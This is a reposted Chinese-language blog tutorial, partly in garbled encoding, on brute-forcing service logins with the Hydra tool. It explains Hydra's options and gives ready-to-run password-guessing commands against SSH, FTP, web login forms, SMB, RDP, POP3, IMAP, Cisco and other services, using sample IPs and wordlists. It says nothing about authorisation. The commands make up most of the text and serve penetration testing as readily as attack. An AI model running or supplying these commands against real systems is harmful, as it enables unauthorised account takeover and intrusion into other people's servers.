8.使用hydra对端口进行爆破
如果對(duì)開啟端口的服務(wù)不清楚,請(qǐng)看我之前寫的文章:https://www.cnblogs.com/bmjoker/p/8833316.html
2018,網(wǎng)站的防護(hù)(sql,xss...)的安全保護(hù)也已經(jīng)上升了一個(gè)等級(jí),但是由于管理員的安全意識(shí)薄弱,網(wǎng)站弱口令漏洞依然猖獗,不信可以看補(bǔ)天的漏洞提交記錄,弱口令依然是漏洞中的佼佼者,當(dāng)然弱口令并不僅限于網(wǎng)站的后臺(tái)登陸弱口令,還有端口,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389遠(yuǎn)程登陸,8080中間件Tomcat,7001中間件Weblogic,3306 Mysql數(shù)據(jù)庫(kù)(phpmyadmin),1433 SQLServer數(shù)據(jù)庫(kù),5432 Postgresql數(shù)據(jù)庫(kù)...
端口掃描不用多講,鄙人還是覺得nmap好一點(diǎn),但是如何批量掃的話,丟包率可能高一點(diǎn)。
對(duì)于端口的爆破,首先要有一個(gè)好的字典,然后再有一個(gè)好的工具,工具的話,python腳本,超級(jí)弱口令檢測(cè)工具....這里主要介紹kali里面hydra的爆破,應(yīng)為hydra支持幾乎所有協(xié)議的在線密碼破解,并且容錯(cuò)率好,不過能不能爆破成功還是需要你有一個(gè)好的字典。
---------------------------------------------------------------
語法:
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]參數(shù)詳解:
-R 根據(jù)上一次進(jìn)度繼續(xù)破解 -S 使用SSL協(xié)議連接 -s 指定端口 -l 指定用戶名 -L 指定用戶名字典(文件) -p 指定密碼破解 -P 指定密碼字典(文件) -e 空密碼探測(cè)和指定用戶密碼探測(cè)(ns)-M <FILE>指定目標(biāo)列表文件一行一條
-f 在使用-M參數(shù)以后,找到第一對(duì)登錄名或者密碼的時(shí)候中止破解。 -C 用戶名可以用:分割(username:password)可以代替-l username -p password -o <FILE>輸出文件 -t 指定多線程數(shù)量,默認(rèn)為16個(gè)線程
-w TIME 設(shè)置最大超時(shí)的時(shí)間,單位秒,默認(rèn)是30s -vV 顯示詳細(xì)過程 server 目標(biāo)IP service 指定服務(wù)名(telnet ftp pop3 mssql mysql ssh ssh2......)
使用案例:
爆破 ssh:22 端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh爆破 Ftp:21 端口命令(指定用戶名為root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftpget方式提交,破解web登錄(指定用戶名為admin):
hydra -L user.txt -p password.txt -t 線程 -vV -e ns ip http-get /admin/ hydra -l admin -p password.txt -t 線程 -vV -e ns -f ip http-get /admin/index.phppost方式提交,破解web登錄:
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"參數(shù)說明:-t同時(shí)線程數(shù)3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當(dāng)破解了一個(gè)密碼就停止, 10.36.16.18目標(biāo)ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示。
破解https:
破解teamspeak:
hydra -l admin -P passworrd.txt -s 端口號(hào) -vV 192.168.0.132 teamspeak破解cisco:
hydra -P password.txt 192.168.0.132 cisco hydra -m cloud -P password.txt 192.168.0.132 cisco-enable破解smb:
hydra -l administrator -P password.txt 192.168.0.132 smb破解pop3:
hydra -l root -P password.txt my.pop3.mail pop3破解rdp(3389端口):
hydra -l administrator -P password.txt -V 192.168.0.132 rdp破解http-proxy:
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132破解imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN?
就先介紹到這里~~~
?
轉(zhuǎn)載于:https://www.cnblogs.com/bmjoker/p/9977881.html
總結(jié)
以上是生活随笔為你收集整理的8.使用hydra对端口进行爆破的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: day11-(cookiesession
- 下一篇: Leetcode24.Swap Node